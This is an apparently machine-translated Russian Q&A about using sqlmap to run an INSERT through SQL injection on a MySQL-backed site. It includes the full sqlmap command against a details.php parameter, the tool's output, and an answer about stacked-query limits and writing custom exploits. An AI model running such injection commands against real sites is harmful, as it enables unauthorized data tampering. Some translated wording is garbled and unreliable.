SQLMAP - как вставить в базу данных, если на сервере MYSQL невозможно выполнить сложные запросы?

Question

Тяговой таблицы базы данных и столбцы отлично работают с использованием SQLMAP, но, как я пытаюсь выполнить оператор INSERT, я получаю следующее сообщение об ошибке:

запрос:

sqlmap -u "http://www.example.com/details.php?item_id=327" -D main_db -T orders --columns --sql-query \ "INSERT INTO orders (order) VALUES ('test')" 


Table:orders 

+---------+----------+ 
| Column | Type  | 
+---------+----------+ 
| order | longtext | 
| data | date  | 
| timp | time  | 
+---------+----------+ 

[22:47:50] [WARNING] execution of custom SQL queries is only available when stacked queries are supported 
INSERT INTO orders (order) VALUES ('test'): None 
[22:47:50] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.example.com' 

Есть ли обходной путь для изменения базы данных с помощью SQLMAP на сервере MYSQL?

Answer 1

Большинство баз данных не позволяют вам просто вставлять данные с помощью SQL Injection (Если вы, конечно, уже находитесь в запросе на вставку, и даже тогда вы обычно не можете управлять именем таблицы). Вы не можете просто складывать запросы, которые разрешены только в Microsoft SQL Server, PostgreSQL и комиксах. Вы можете использовать выбор суб-select или union для доступа к данным из другой таблицы, а SQLMap делает это за кулисами.

Реальная сила SQLMap заключается в перераспределении данных. Если вам нужно что-то более сложное, например, многоэтапная атака, которая дает вам оболочку, тогда вам нужно написать эксплойт. Снимите тренировочные колеса и станьте мужчиной (или женщиной).

Ответ позорно скопирована из here